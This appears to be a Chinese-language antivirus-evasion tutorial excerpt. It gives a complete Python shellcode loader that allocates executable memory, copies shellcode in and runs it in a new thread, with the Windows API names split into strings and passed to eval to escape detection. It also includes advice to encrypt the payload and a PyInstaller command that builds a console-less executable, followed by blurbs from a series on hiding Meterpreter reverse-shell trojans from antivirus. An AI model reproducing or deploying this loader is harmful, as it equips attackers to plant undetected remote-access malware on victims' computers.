使用python版本為python3.6 32位版本,64位版本測試會報錯。
安裝pyinstaller,pywin32
pip3 install pyinstaller
pip3 install pywin32
#shellcode 放這個位置
c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89";
shellcode = bytearray(c)
a = 'ctypes.windll.' + 'kernel32.virtualalloc'
ptr = eval(a)(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
b = 'ctypes.windll.kernel32.' + 'rtlmovememory'
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
eval(b)(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
d = 'ctypes.windll.kernel32.' + 'createthread'
ht = eval(d)(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
e = 'ctypes.windll.kernel32.waitfor' + 'singleobject'
eval(e)(ctypes.c_int(ht),ctypes.c_int(-1))
可以使用加密等方法進行免殺。
pyinstaller -f shell.py --noconsole遠控免殺專題 13 zirikatu免殺
0x01 免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情...
遠控免殺專題 18 ASWCrypter免殺
免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情況下360...
《黑客免殺攻防學習筆記》 免殺與特徵碼
1.特徵碼免殺技術 這裡主要是用到分割法,就是將乙份病毒檔案分割成多份讓反病毒軟體掃瞄,然後再將掃瞄出有問題的那份檔案再次分割,直到分割到長度適合為止。如下圖所示 若是獲得合適的檔案之後,再將這份檔案進行相應的處理,比如可以新增一些花指令等 混淆技術。因為許多防毒軟體進行查殺都是直接特徵碼或是校驗和...